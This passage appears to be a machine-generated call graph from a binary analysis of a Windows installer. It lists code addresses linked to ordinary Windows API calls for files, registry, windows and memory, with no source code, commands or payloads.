5210 402788 5209->5210 5211 40279d 5209->5211 5212 4027a6 5211->5212 5215 405e2f wsprintfW 5211->5215 5216 405ee8 lstrcpynW 5212->5216 5215->5212 5216->5210 5217 4018ef 5218 401926 5217->5218 5219 402b38 18 API calls 5218->5219 5220 40192b 5219->5220 5221 405770 71 API calls 5220->5221 5222 401934 5221->5222 5223 403870 5224 40387b 5223->5224 5225 403882 GlobalAlloc 5224->5225 5226 40387f 5224->5226 5225->5226 5227 402571 5228 402b1b 18 API calls 5227->5228 5229 402580 5228->5229 5230 4025c6 ReadFile 5229->5230 5231 405bd7 ReadFile 5229->5231 5232 4026a0 5229->5232 5233 402606 MultiByteToWideChar 5229->5233 5235 40262c SetFilePointer MultiByteToWideChar 5229->5235 5236 4026b1 5229->5236 5238 40269e 5229->5238 5230->5229 5230->5238 5231->5229 5239 405e2f wsprintfW 5232->5239 5233->5229 5235->5229 5237 4026d2 SetFilePointer 5236->5237 5236->5238 5237->5238 5239->5238 5240 4014f1 SetForegroundWindow 5241 4029c5 5240->5241 5249 4018f2 5250 402b38 18 API calls 5249->5250 5251 4018f9 5250->5251 5252 4056c4 MessageBoxIndirectW 5251->5252 5253 401902 5252->5253 4343 401df3 4344 402b38 18 API calls 4343->4344 4345 401df9 4344->4345 4346 402b38 18 API calls 4345->4346 4347 401e02 4346->4347 4348 402b38 18 API calls 4347->4348 4349 401e0b 4348->4349 4350 402b38 18 API calls 4349->4350 4351 401e14 4350->4351 4355 401423 4351->4355 4354 401e4c 4356 405192 25 API calls 4355->4356 4357 401431 ShellExecuteW 4356->4357 4357->4354 5266 4026f7 5267 4026fe 5266->5267 5269 402970 5266->5269 5268 402b1b 18 API calls 5267->5268 5270 402709 5268->5270 5271 402710 SetFilePointer 5270->5271 5271->5269 5272 402720 5271->5272 5274 405e2f wsprintfW 5272->5274 5274->5269 5282 40427b lstrlenW 5283 40429a 5282->5283 5284 40429c WideCharToMultiByte 5282->5284 5283->5284 5285 1000103d 5286 1000101b 7 API calls 5285->5286 5287 10001056 5286->5287 5288 402c7d 5289 402ca8 5288->5289 5290 402c8f SetTimer 5288->5290 5291 402cf6 5289->5291 5292 402cfc MulDiv 5289->5292 5290->5289 5293 402cb6 wsprintfW SetWindowTextW SetDlgItemTextW 5292->5293 5293->5291 5295 4014ff 5296 401507 5295->5296 5298 40151a 5295->5298 5297 402b1b 18 API calls 5296->5297 5297->5298 5299 401000 5300 401037 BeginPaint GetClientRect 5299->5300 5303 40100c DefWindowProcW 5299->5303 5301 4010f3 5300->5301 5304 401073 CreateBrushIndirect FillRect DeleteObject 5301->5304 5305 4010fc 5301->5305 5306 401179 5303->5306 5304->5301 5307 401102 CreateFontIndirectW 5305->5307 5308 401167 EndPaint 5305->5308 5307->5308 5309 401112 6 API calls 5307->5309 5308->5306 5309->5308 5310 401a00 5311 402b38 18 API calls 5310->5311 5312 401a09 ExpandEnvironmentStringsW 5311->5312 5313 401a30 5312->5313 5314 401a1d 5312->5314 5314->5313 5315 401a22 lstrcmpW 5314->5315 5315->5313 5316 401b01 5317 402b38 18 API calls 5316->5317 5318 401b08 5317->5318 5319 402b1b 18 API calls 5318->5319 5320 401b11 wsprintfW 5319->5320 5321 4029c5 5320->5321 5322 100018c1 5323 10001243 3 API calls 5322->5323 5324 100018e7 5323->5324 5325 10001243 3 API calls 5324->5325 5326 100018ef 5325->5326 5327 10001243 3 API calls 5326->5327 5329 10001931 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5326->5329 5328 10001916 5327->5328 5330 1000191f GlobalFree 5328->5330 5331 10001280 2 API calls 5329->5331 5330->5329 5332 10001aad GlobalFree GlobalFree 5331->5332 5333 404581 5334 404591 5333->5334 5335 4045b7 5333->5335 5336 40412d 19 API calls 5334->5336 5337 404194 8 API calls 5335->5337 5338 40459e SetDlgItemTextW 5336->5338 5339 4045c3 5337->5339 5338->5335 5340 405106 5341 405116 5340->5341 5342 40512a 5340->5342 5343 405173 5341->5343 5344 40511c 5341->5344 5345 405132 IsWindowVisible 5342->5345 5351 405149 5342->5351 5346 405178 CallWindowProcW 5343->5346 5347 404179 SendMessageW 5344->5347 5345->5343 5348 40513f 5345->5348 5349 405126 5346->5349 5347->5349 5353 404a5c SendMessageW 5348->5353 5351->5346 5358 404adc 5351->5358 5354 404abb SendMessageW 5353->5354 5355 404a7f GetMessagePos ScreenToClient SendMessageW 5353->5355 5356 404ab3 5354->5356 5355->5356 5357 404ab8 5355->5357 5356->5351 5357->5354 5367 405ee8 lstrcpynW 5358->5367 5360 404aef 5368 405e2f wsprintfW 5360->5368 5362 404af9 5363 40140b 2 API calls 5362->5363 5364 404b02 5363->5364 5369 405ee8 lstrcpynW 5364->5369 5366 404b09 5366->5343 5367->5360 5368->5362 5369->5366 5370 401f08 5371 402b38 18 API calls 5370->5371 5372 401f0f GetFileVersionInfoSizeW 5371->5372 5373 401f36 GlobalAlloc 5372->5373 5374 401f8c 5372->5374 5373->5374 5375 401f4a GetFileVersionInfoW 5373->5375 5375->5374 5376 401f59 VerQueryValueW 5375->5376 5376->5374 5377 401f72 5376->5377 5381 405e2f wsprintfW 5377->5381 5379 401f7e 5382 405e2f wsprintfW 5379->5382 5381->5379 5382->5374 5390 10002a4b 5391 10002a63 5390->5391 5392 100015a7 2 API calls 5391->5392 5393 10002a7e 5392->5393 5394 1000224c 5395 100022b1 5394->5395 5396 100022e7 5394->5396 5395->5396 5397 100022c3 GlobalAlloc 5395->5397 5397->5395 5398 404b0e GetDlgItem GetDlgItem 5399 404b60 7 API calls 5398->5399 5407 404d79 5398->5407 5400 404c03 DeleteObject 5399->5400 5401 404bf6 SendMessageW 5399->5401 5402 404c0c 5400->5402 5401->5400 5403 404c43 5402->5403 5406 405f0a 18 API calls 5402->5406 5404 40412d 19 API calls 5403->5404 5408 404c57 5404->5408 5405 404f09 5410 404f13 SendMessageW 5405->5410 5411 404f1b 5405->5411 5412 404c25 SendMessageW SendMessageW 5406->5412 5413 404a5c 5 API calls 5407->5413 5417 404e5d 5407->5417 5428 404dea 5407->5428 5414 40412d 19 API calls 5408->5414 5409 404d6c 5416 404194 8 API calls 5409->5416 5410->5411 5419 404f34 5411->5419 5420 404f2d ImageList_Destroy 5411->5420 5429 404f44 5411->5429 5412->5402 5413->5428 5433 404c65 5414->5433 5415 404eb6 SendMessageW 5415->5409 5422 404ecb SendMessageW 5415->5422 5423 4050ff 5416->5423 5417->5405 5417->5409 5417->5415 5418 404e4f SendMessageW 5418->5417 5424 404f3d GlobalFree 5419->5424 5419->5429 5420->5419 5421 4050b3 5421->5409 5430 4050c5 ShowWindow GetDlgItem ShowWindow 5421->5430 5426 404ede 5422->5426 5424->5429 5425 404d3a GetWindowLongW SetWindowLongW 5427 404d53 5425->5427 5437 404eef SendMessageW 5426->5437 5431 404d71 5427->5431 5432 404d59 ShowWindow 5427->5432 5428->5417 5428->5418 5429->5421 5441 404adc 4 API calls 5429->5441 5445 404f7f 5429->5445 5430->5409 5450 404162 SendMessageW 5431->5450 5449 404162 SendMessageW 5432->5449 5433->5425 5436 404cb5 SendMessageW 5433->5436 5438 404d34 5433->5438 5439 404cf1 SendMessageW 5433->5439 5440 404d02 SendMessageW 5433->5440 5436->5433 5437->5405 5438->5425 5438->5427 5439->5433 5440->5433 5441->5445 5442 405089 InvalidateRect 5442->5421 5443 40509f 5442->5443 5446 404976 21 API calls 5443->5446 5444 404fad SendMessageW 5448 404fc3 5444->5448 5445->5444 5445->5448 5446->5421 5447 405037 SendMessageW SendMessageW 5447->5448 5448->5442 5448->5447 5449->5409 5450->5407 5451 100016ce 5452 100016fd 5451->5452 5453 10001b3e 24 API calls 5452->5453 5454 10001704 5453->5454 5455 10001717 5454->5455 5456 1000170b 5454->5456 5458 10001721 5455->5458 5459 1000173e 5455->5459 5457 10001280 2 API calls 5456->5457 5465 10001715 5457->5465 5462 10001555 2 API calls 5458->5462 5460 10001744 5459->5460 5461 10001768 5459->5461 5463 100015cc 2 API calls 5460->5463 5464 10001555 2 API calls 5461->5464 5466 10001726 5462->5466 5467 10001749 5463->5467 5464->5465 5468 100015cc 2 API calls 5466->5468 5469 10001280 2 API calls 5467->5469 5470 1000172c 5468->5470 5471 1000174f GlobalFree 5469->5471 5472 10001280 2 API calls 5470->5472 5471->5465 5474 10001763 GlobalFree 5471->5474 5473 10001732 GlobalFree 5472->5473 5473->5465 5474->5465 5475 404910 5476 404920 5475->5476 5477 40493c 5475->5477 5486 4056a8 GetDlgItemTextW 5476->5486 5479 404942 SHGetPathFromIDListW 5477->5479 5480 40496f 5477->5480 5482 404959 SendMessageW 5479->5482 5483 404952 5479->5483 5481 40492d SendMessageW 5481->5477 5482->5480 5484 40140b 2 API calls 5483->5484 5484->5482 5486->5481 5487 401491 5488 405192 25 API calls 5487->5488 5489 401498 5488->5489 4358 402293 4359 402b38 18 API calls 4358->4359 4360 4022a2 4359->4360 4361 402b38 18 API calls 4360->4361 4362 4022ab 4361->4362 4363 402b38 18 API calls 4362->4363 4364 4022b5 GetPrivateProfileStringW 4363->4364 4655 401718 4656 402b38 18 API calls 4655->4656 4657 40171f SearchPathW 4656->4657 4658 40173a 4657->4658 4659 401f98 4660 401faa 4659->4660 4670 40205c 4659->4670 4661 402b38 18 API calls 4660->4661 4662 401fb1 4661->4662 4664 402b38 18 API calls 4662->4664 4663 401423 25 API calls 4665 402195 4663->4665 4666 401fba 4664->4666 4667 401fd0 LoadLibraryExW 4666->4667 4668 401fc2 GetModuleHandleW 4666->4668 4669 401fe1 4667->4669 4667->4670 4668->4667 4668->4669 4682 4062be WideCharToMultiByte 4669->4682 4670->4663 4673 401ff2 4675 402011 4673->4675 4676 401ffa 4673->4676 4674 40202b 4677 405192 25 API calls 4674->4677 4685 10001771 4675->4685 4679 401423 25 API calls 4676->4679 4678 402002 4677->4678 4678->4665 4680 40204e FreeLibrary 4678->4680 4679->4678 4680->4665 4683 4062e8 GetProcAddress 4682->4683 4684 401fec 4682->4684 4683->4684 4684->4673 4684->4674 4686 100017a1 4685->4686 4727 10001b3e 4686->4727 4688 100017a8 4689 100018be 4688->4689 4690 100017c0 4688->4690 4691 100017b9 4688->4691 4689->4678 4761 100022eb 4690->4761 4779 100022a1 4691->4779 4696 10001824 4700 10001866 4696->4700 4701 1000182a 4696->4701 4697 10001806 4792 1000248d 4697->4792 4698 100017d6 4703 100017dc 4698->4703 4708 100017e7 4698->4708 4699 100017ef 4712 100017e5 4699->4712 4789 10002b2b 4699->4789 4706 1000248d 10 API calls 4700->4706 4704 100015cc 2 API calls 4701->4704 4703->4712 4773 10002870 4703->4773 4711 10001840 4704->4711 4713 10001858 4706->4713 4783 10002614 4708->4783 4716 1000248d 10 API calls 4711->4716 4712->4696 4712->4697 4718 100018ad 4713->4718 4812 10002450 4713->4812 4715 100017ed 4715->4712 4716->4713 4718->4689 4720 100018b7 GlobalFree 4718->4720 4720->4689 4724 10001899 4724->4718 4816 10001555 4724->4816 4726 10001892 FreeLibrary 4726->4724 4820 1000121b GlobalAlloc 4727->4820 4729 10001b62 4821 1000121b GlobalAlloc 4729->4821 4731 10001b6d 4822 10001243 4731->4822 4733 10001da0 GlobalFree GlobalFree GlobalFree 4734 10001dbd 4733->4734 4748 10001e07 4733->4748 4735 1000210d 4734->4735 4742 10001dd2 4734->4742 4734->4748 4737 1000212f GetModuleHandleW 4735->4737 4735->4748 4736 10001c43 GlobalAlloc 4758 10001b75 4736->4758 4740 10002140 LoadLibraryW 4737->4740 4741 10002155 4737->4741 4738 10001c8e lstrcpyW 4743 10001c98 lstrcpyW 4738->4743 4739 10001cac GlobalFree 4739->4758 4740->4741 4740->4748 4833 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4741->4833 4742->4748 4829 1000122c 4742->4829 4743->4758 4745 100021a7 4746 100021b4 lstrlenW 4745->4746 4745->4748 4834 10001617 WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4746->4834 4748->4688 4749 10002167 4749->4745 4760 10002191 GetProcAddress 4749->4760 4751 10002067 4751->4748 4756 100020af lstrcpyW 4751->4756 4753 10001cea 4753->4758 4827 100015a7 GlobalSize GlobalAlloc 4753->4827 4754 10001f56 GlobalFree 4754->4758 4755 100021ce 4755->4748 4756->4748 4758->4733 4758->4736 4758->4738 4758->4739 4758->4743 4758->4748 4758->4751 4758->4753 4758->4754 4759 1000122c 2 API calls 4758->4759 4832 1000121b GlobalAlloc 4758->4832 4759->4758 4760->4745 4770 10002303 4761->4770 4762 1000122c GlobalAlloc lstrcpynW 4762->4770 4763 10001243 3 API calls 4763->4770 4765 10002419 GlobalFree 4766 100017c6 4765->4766 4765->4770 4766->4698 4766->4699 4766->4712 4767 100023d5 GlobalAlloc WideCharToMultiByte 4767->4765 4768 100023ae GlobalAlloc CLSIDFromString 4768->4765 4769 10002390 lstrlenW 4769->4765 4772 1000239b 4769->4772 4770->4762 4770->4763 4770->4765 4770->4767 4770->4768 4770->4769 4837 100012c8 4770->4837 4772->4765 4842 100025a8 4772->4842 4775 10002882 4773->4775 4774 10002927 EnumWindows 4776 10002945 4774->4776 4775->4774 4777 10002a41 4776->4777 4778 10002a36 GetLastError 4776->4778 4777->4712 4778->4777 4780 100022b1 4779->4780 4781 100017bf 4779->4781 4780->4781 4782 100022c3 GlobalAlloc 4780->4782 4781->4690 4782->4780 4787 10002630 4783->4787 4784 10002681 GlobalAlloc 4788 100026a3 4784->4788 4785 10002694 4786 10002699 GlobalSize 4785->4786 4785->4788 4786->4788 4787->4784 4787->4785 4788->4715 4790 10002b36 4789->4790 4791 10002b76 GlobalFree 4790->4791 4795 100024ad 4792->4795 4794 10002540 lstrcpyW 4794->4795 4795->4794 4796 1000250e MultiByteToWideChar 4795->4796 4797 10002561 GlobalFree 4795->4797 4798 1000258a GlobalFree 4795->4798 4800 100024fd lstrcpynW 4795->4800 4801 10001280 2 API calls 4795->4801 4802 100024ec StringFromGUID2 4795->4802 4845 1000121b GlobalAlloc 4795->4845 4846 100012f3 4795->4846 4796->4795 4797->4795 4798->4795 4799 1000180c 4798->4799 4804 100015cc 4799->4804 4800->4795 4801->4795 4802->4795 4850 1000121b GlobalAlloc 4804->4850 4806 100015d2 4807 100015e4 lstrcpyW 4806->4807 4808 100015f9 4806->4808 4807->4808 4809 10001280 4808->4809 4810 100012c3 GlobalFree 4809->4810 4811 10001289 GlobalAlloc lstrcpynW 4809->4811 4810->4713 4811->4810 4813 1000245e 4812->4813 4814 10001879 4812->4814 4813->4814 4815 1000247a GlobalFree 4813->4815 4814->4724 4814->4726 4815->4813 4817 1000156d 4816->4817 4818 10001280 2 API calls 4817->4818 4819 10001576 4818->4819 4819->4718 4820->4729 4821->4731 4823 1000127c 4822->4823 4824 1000124d 4822->4824 4823->4758 4824->4823 4835 1000121b GlobalAlloc 4824->4835 4826 10001259 lstrcpyW GlobalFree 4826->4758 4828 100015c5 4827->4828 4828->4753 4836 1000121b GlobalAlloc 4829->4836 4831 1000123b lstrcpynW 4831->4748 4832->4758 4833->4749 4834->4755 4835->4826 4836->4831 4838 100012d0 4837->4838 4839 100012ee 4837->4839 4838->4839 4840 1000122c 2 API calls 4838->4840 4839->4839 4841 100012ec 4840->4841 4841->4770 4843 100025b6 VirtualAlloc 4842->4843 4844 1000260c 4842->4844 4843->4844 4844->4772 4845->4795 4847 10001324 4846->4847 4848 100012fc 4846->4848 4847->4795 4848->4847 4849 10001308 lstrcpyW 4848->4849 4849->4847 4850->4806 5490 10001058 5491 10001243 3 API calls 5490->5491 5493 10001074 5491->5493 5492 100010dd 5493->5492 5494 1000152e 4 API calls 5493->5494 5495 10001092 5493->5495 5494->5495 5496 1000152e 4 API calls 5495->5496 5497 100010a2 5496->5497 5498 100010b2 5497->5498 5499 100010a9 GlobalSize 5497->5499 5500 100010b6 GlobalAlloc 5498->5500 5501 100010c7 5498->5501 5499->5498 5502 10001555 2 API calls 5500->5502 5503 100010d2 GlobalFree 5501->5503 5502->5501 5503->5492 5504 40159b 5505 402b38 18 API calls 5504->5505 5506 4015a2 SetFileAttributesW 5505->5506 5507 4015b4 5506->5507 4886 40219e 4887 402b38 18 API calls 4886->4887 4888 4021a4 4887->4888 4889 402b38 18 API calls 4888->4889 4890 4021ad 4889->4890 4891 402b38 18 API calls 4890->4891 4892 4021b6 4891->4892 4893 40622b 2 API calls 4892->4893 4894 4021bf 4893->4894 4895 4021d0 lstrlenW lstrlenW 4894->4895 4896 4021c3 4894->4896 4898 405192 25 API calls 4895->4898 4897 405192 25 API calls 4896->4897 4900 4021cb 4896->4900 4897->4900 4899 40220e SHFileOperationW 4898->4899 4899->4896 4899->4900 5508 40149e 5509 40223c 5508->5509 5510 4014ac PostQuitMessage 5508->5510 5510->5509 5511 4029a0 SendMessageW 5512 4029c5 5511->5512 5513 4029ba InvalidateRect 5511->5513 5513->5512 5521 100010e1 5522 10001111 5521->5522 5523 10001243 3 API calls 5522->5523 5533 10001121 5523->5533 5524 100011d8 GlobalFree 5525 100012c8 2 API calls 5525->5533 5526 100011d3 5526->5524 5527 10001243 3 API calls 5527->5533 5528 10001164 GlobalAlloc 5528->5533 5529 100011f8 GlobalFree 5529->5533 5530 10001280 2 API calls 5532 100011c4 GlobalFree 5530->5532 5531 100012f3 lstrcpyW 5531->5533 5532->5533 5533->5524 5533->5525 5533->5526 5533->5527 5533->5528 5533->5529 5533->5530 5533->5531 5533->5532 5534 402222 5535 402229 5534->5535 5538 40223c 5534->5538 5536 405f0a 18 API calls 5535->5536 5537 402236 5536->5537 5539 4056c4 MessageBoxIndirectW 5537->5539 5539->5538 5540 401b22 5541 401b73 5540->5541 5542 401b2f 5540->5542 5544 401b78 5541->5544 5545 401b9d GlobalAlloc 5541->5545 5543 401bb8 5542->5543 5548 401b46 5542->5548 5546 405f0a 18 API calls 5543->5546 5553 40223c 5543->5553 5544->5553 5561 405ee8 lstrcpynW 5544->5561 5547 405f0a 18 API calls 5545->5547 5549 402236 5546->5549 5547->5543 5559 405ee8 lstrcpynW 5548->5559 5555 4056c4 MessageBoxIndirectW 5549->5555 5552 401b8a GlobalFree 5552->5553 5554 401b55 5560 405ee8 lstrcpynW 5554->5560 5555->5553 5557 401b64 5562 405ee8 lstrcpynW 5557->5562 5559->5554 5560->5557 5561->5552 5562->5553 3906 401924 3907 401926 3906->3907 3912 402b38 3907->3912 3913 402b44 3912->3913 3957 405f0a 3913->3957 3916 40192b 3918 405770 3916->3918 3996 405a3b 3918->3996 3921 405798 DeleteFileW 3923 401934 3921->3923 3922 4057af 3924 4058da 3922->3924 4010 405ee8 lstrcpynW 3922->4010 3924->3923 4040 40622b FindFirstFileW 3924->4040 3926 4057d5 3927 4057e8 3926->3927 3928 4057db lstrcatW 3926->3928 4011 40597f lstrlenW 3927->4011 3930 4057ee 3928->3930 3933 4057fe lstrcatW 3930->3933 3934 405809 lstrlenW FindFirstFileW 3930->3934 3933->3934 3938 4058cf 3934->3938 3955 40582b 3934->3955 3935 4058f8 4043 405933 lstrlenW CharPrevW 3935->4043 3938->3924 3939 4058b2 FindNextFileW 3943 4058c8 FindClose 3939->3943 3939->3955 3940 405728 5 API calls 3942 40590a 3940->3942 3944 405924 3942->3944 3945 40590e 3942->3945 3943->3938 3947 405192 25 API calls 3944->3947 3945->3923 3948 405192 25 API calls 3945->3948 3947->3923 3950 40591b 3948->3950 3949 405770 64 API calls 3949->3955 3952 405d82 40 API calls 3950->3952 3951 405192 25 API calls 3951->3939 3954 405922 3952->3954 3954->3923 3955->3939 3955->3949 3955->3951 4015 405ee8 lstrcpynW 3955->4015 4016 405728 3955->4016 4024 405192 3955->4024 4035 405d82 3955->4035 3962 405f17 3957->3962 3958 406162 3959 402b65 3958->3959 3991 405ee8 lstrcpynW 3958->3991 3959->3916 3975 40617c 3959->3975 3961 405fca GetVersion 3961->3962 3962->3958 3962->3961 3963 406130 lstrlenW 3962->3963 3966 405f0a 10 API calls 3962->3966 3968 406045 GetSystemDirectoryW 3962->3968 3969 406058 GetWindowsDirectoryW 3962->3969 3970 40617c 5 API calls 3962->3970 3971 40608c SHGetSpecialFolderLocation 3962->3971 3972 405f0a 10 API calls 3962->3972 3973 4060d1 lstrcatW 3962->3973 3984 405db5 RegOpenKeyExW 3962->3984 3989 405e2f wsprintfW 3962->3989 3990 405ee8 lstrcpynW 3962->3990 3963->3962 3966->3963 3968->3962 3969->3962 3970->3962 3971->3962 3974 4060a4 SHGetPathFromIDListW CoTaskMemFree 3971->3974 3972->3962 3973->3962 3974->3962 3982 406189 3975->3982 3976 4061ff 3977 406204 CharPrevW 3976->3977 3979 406225 3976->3979 3977->3976 3978 4061f2 CharNextW 3978->3976 3978->3982 3979->3916 3981 4061de CharNextW 3981->3982 3982->3976 3982->3978 3982->3981 3983 4061ed CharNextW 3982->3983 3992 405960 3982->3992 3983->3978 3985 405e29 3984->3985 3986 405de9 RegQueryValueExW 3984->3986 3985->3962 3988 405e0a RegCloseKey 3986->3988 3988->3985 3989->3962 3990->3962 3991->3959 3993 405966 3992->3993 3994 40597c 3993->3994 3995 40596d CharNextW 3993->3995 3994->3982 3995->3993 4046 405ee8 lstrcpynW 3996->4046 3998 405a4c 4047 4059de CharNextW CharNextW 3998->4047 4001 405790 4001->3921 4001->3922 4002 40617c 5 API calls 4008 405a62 4002->4008 4003 405a93 lstrlenW 4004 405a9e 4003->4004 4003->4008 4006 405933 3 API calls 4004->4006 4005 40622b 2 API calls 4005->4008 4007 405aa3 GetFileAttributesW 4006->4007 4007->4001 4008->4001 4008->4003 4008->4005 4009 40597f 2 API calls 4008->4009 4009->4003 4010->3926 4012 40598d 4011->4012 4013 405993 CharPrevW 4012->4013 4014 40599f 4012->4014 4013->4012 4013->4014 4014->3930 4015->3955 4053 405b2f GetFileAttributesW 4016->4053 4018 405755 4018->3955 4020 405743 RemoveDirectoryW 4022 405751 4020->4022 4021 40574b DeleteFileW 4021->4022 4022->4018 4023 405761 SetFileAttributesW 4022->4023 4023->4018 4025 4051ad 4024->4025 4026 40524f 4024->4026 4027 4051c9 lstrlenW 4025->4027 4028 405f0a 18 API calls 4025->4028 4026->3955 4029 4051f2 4027->4029 4030 4051d7 lstrlenW 4027->4030 4028->4027 4032 405205 4029->4032 4033 4051f8 SetWindowTextW 4029->4033 4030->4026 4031 4051e9 lstrcatW 4030->4031 4031->4029 4032->4026 4034 40520b SendMessageW SendMessageW SendMessageW 4032->4034 4033->4032 4034->4026 4056 406252 GetModuleHandleA 4035->4056 4039 405daa 4039->3955 4041 406241 FindClose 4040->4041 4042 4058f4 4040->4042 4041->4042 4042->3923 4042->3935 4044 4058fe 4043->4044 4045 40594f lstrcatW 4043->4045 4044->3940 4045->4044 4046->3998 4048 4059fb 4047->4048 4051 405a0d 4047->4051 4050 405a08 CharNextW 4048->4050 4048->4051 4049 405a31 4049->4001 4049->4002 4050->4049 4051->4049 4052 405960 CharNextW 4051->4052 4052->4051 4054 405b41 SetFileAttributesW 4053->4054 4055 405734 4053->4055 4054->4055 4055->4018 4055->4020 4055->4021 4057 406279 GetProcAddress 4056->4057 4058 40626e LoadLibraryA 4056->4058 4059 405d89 4057->4059 4058->4057 4058->4059 4059->4039 4060 405c06 lstrcpyW 4059->4060 4061 405c55 GetShortPathNameW 4060->4061 4062 405c2f 4060->4062 4063 405c6a 4061->4063 4064 405d7c 4061->4064 4085 405b54 GetFileAttributesW CreateFileW 4062->4085 4063->4064 4066 405c72 wsprintfA 4063->4066 4064->4039 4068 405f0a 18 API calls 4066->4068 4067 405c39 CloseHandle GetShortPathNameW 4067->4064 4069 405c4d 4067->4069 4070 405c9a 4068->4070 4069->4061 4069->4064 4086 405b54 GetFileAttributesW CreateFileW 4070->4086 4072 405ca7 4072->4064 4073 405cb6 GetFileSize GlobalAlloc 4072->4073 4074 405d75 CloseHandle 4073->4074 4075 405cd8 4073->4075 4074->4064 4087 405bd7 ReadFile 4075->4087 4080 405cf7 lstrcpyA 4083 405d19 4080->4083 4081 405d0b 4082 405ab9 4 API calls 4081->4082 4082->4083 4084 405d50 SetFilePointer WriteFile GlobalFree 4083->4084 4084->4074 4085->4067 4086->4072 4088 405bf5 4087->4088 4088->4074 4089 405ab9 lstrlenA 4088->4089 4090 405afa lstrlenA 4089->4090 4091 405b02 4090->4091 4092 405ad3 lstrcmpiA 4090->4092 4091->4080 4091->4081 4092->4091 4093 405af1 CharNextA 4092->4093 4093->4090 5563 10001667 5564 1000152e 4 API calls 5563->5564 5567 1000167f 5564->5567 5565 100016c5 GlobalFree 5566 1000169a 5566->5565 5567->5565 5567->5566 5568 100016b1 VirtualFree 5567->5568 5568->5565 5569 402727 5570 4029c5 5569->5570 5571 40272e 5569->5571 5572 402734 FindClose 5571->5572 5572->5570 5573 401cab 5574 402b1b 18 API calls 5573->5574 5575 401cb2 5574->5575 5576 402b1b 18 API calls 5575->5576 5577 401cba GetDlgItem 5576->5577 5578 4024e6 5577->5578 4105 40232f 4106 402335 4105->4106 4107 402b38 18 API calls 4106->4107 4108 402347 4107->4108 4109 402b38 18 API calls 4108->4109 4110 402351 RegCreateKeyExW 4109->4110 4111 40237b 4110->4111 4113 402791 4110->4113 4112 402396 4111->4112 4114 402b38 18 API calls 4111->4114 4115 402b1b 18 API calls 4112->4115 4118 4023a2 4112->4118 4117 40238c lstrlenW 4114->4117 4115->4118 4116 4023bd RegSetValueExW 4120 4023d3 RegCloseKey 4116->4120 4117->4112 4118->4116 4122 403060 4118->4122 4120->4113 4123 403070 SetFilePointer 4122->4123 4124 40308c 4122->4124 4123->4124 4137 40317b GetTickCount 4124->4137 4127 405bd7 ReadFile 4128 4030ac 4127->4128 4129 40317b 43 API calls 4128->4129 4133 403137 4128->4133 4130 4030c3 4129->4130 4131 40313d ReadFile 4130->4131 4130->4133 4134 4030d3 4130->4134 4131->4133 4133->4116 4134->4133 4135 405bd7 ReadFile 4134->4135 4136 403106 WriteFile 4134->4136 4135->4134 4136->4133 4136->4134 4138 4032e5 4137->4138 4139 4031aa 4137->4139 4140 402d18 33 API calls 4138->4140 4150 40330d SetFilePointer 4139->4150 4146 403093 4140->4146 4142 4031b5 SetFilePointer 4147 4031da 4142->4147 4146->4127 4146->4133 4147->4146 4148 40326f WriteFile 4147->4148 4149 4032c6 SetFilePointer 4147->4149 4151 4032f7 4147->4151 4154 40638e 4147->4154 4161 402d18 4147->4161 4148->4146 4148->4147 4149->4138 4150->4142 4152 405bd7 ReadFile 4151->4152 4153 40330a 4152->4153 4153->4147 4155 4063b3 4154->4155 4156 4063bb 4154->4156 4155->4147 4156->4155 4157 406442 GlobalFree 4156->4157 4158 40644b GlobalAlloc 4156->4158 4159 4064c2 GlobalAlloc 4156->4159 4160 4064b9 GlobalFree 4156->4160 4157->4158 4158->4155 4158->4156 4159->4155 4159->4156 4160->4159 4162 402d41 4161->4162 4163 402d29 4161->4163 4164 402d51 GetTickCount 4162->4164 4165 402d49 4162->4165 4166 402d32 DestroyWindow 4163->4166 4167 402d39 4163->4167 4164->4167 4169 402d5f 4164->4169 4176 40628b 4165->4176 4166->4167 4167->4147 4170 402d94 CreateDialogParamW ShowWindow 4169->4170 4171 402d67 4169->4171 4170->4167 4171->4167 4180 402cfc 4171->4180 4173 402d75 wsprintfW 4174 405192 25 API calls 4173->4174 4175 402d92 4174->4175 4175->4167 4177 4062a8 PeekMessageW 4176->4177 4178 4062b8 4177->4178 4179 40629e DispatchMessageW 4177->4179 4178->4167 4179->4177 4181 402d0b 4180->4181 4182 402d0d MulDiv 4180->4182 4181->4182 4182->4173 5579 4016af 5580 402b38 18 API calls 5579->5580 5581 4016b5 GetFullPathNameW 5580->5581 5582 4016cf 5581->5582 5583 4016f1 5581->5583 5582->5583 5586 40622b 2 API calls 5582->5586 5584 4029c5 5583->5584 5585 401706 GetShortPathNameW 5583->5585 5585->5584 5587 4016e1 5586->5587 5587->5583 5589 405ee8 lstrcpynW 5587->5589 5589->5583 5597 4027b3 5598 402b38 18 API calls 5597->5598 5599 4027c1 5598->5599 5600 4027d7 5599->5600 5601 402b38 18 API calls 5599->5601 5602 405b2f 2 API calls 5600->5602 5601->5600 5603 4027dd 5602->5603 5623 405b54 GetFileAttributesW CreateFileW 5603->5623 5605 4027ea 5606 402893 5605->5606 5607 4027f6 GlobalAlloc 5605->5607 5610 40289b DeleteFileW 5606->5610 5611 4028ae 5606->5611 5608 40288a CloseHandle 5607->5608 5609 40280f 5607->5609 5608->5606 5624 40330d SetFilePointer 5609->5624 5610->5611 5613 402815 5614 4032f7 ReadFile 5613->5614 5615 40281e GlobalAlloc 5614->5615 5616 402862 WriteFile GlobalFree 5615->5616 5617 40282e 5615->5617 5618 403060 46 API calls 5616->5618 5619 403060 46 API calls 5617->5619 5620 402887 5618->5620 5622 40283b 5619->5622 5620->5608 5621 402859 GlobalFree 5621->5616 5622->5621 5623->5605 5624->5613 5625 4028b4 5626 402b1b 18 API calls 5625->5626 5627 4028ba 5626->5627 5628 4028f6 5627->5628 5629 4028dd 5627->5629 5634 402791 5627->5634 5632 402900 5628->5632 5633 40290c 5628->5633 5630 4028e2 5629->5630 5631 4028f3 5629->5631 5639 405ee8 lstrcpynW 5630->5639 5631->5634 5640 405e2f wsprintfW 5631->5640 5635 402b1b 18 API calls 5632->5635 5636 405f0a 18 API calls 5633->5636 5635->5631 5636->5631 5639->5634 5640->5634 5641 4014b8 5642 4014be 5641->5642 5643 401389 2 API calls 5642->5643 5644 4014c6 5643->5644 4851 4015b9 4852 402b38 18 API calls 4851->4852 4853 4015c0 4852->4853 4854 4059de 4 API calls 4853->4854 4865 4015c9 4854->4865 4855 401614 4856 401646 4855->4856 4857 401619 4855->4857 4863 401423 25 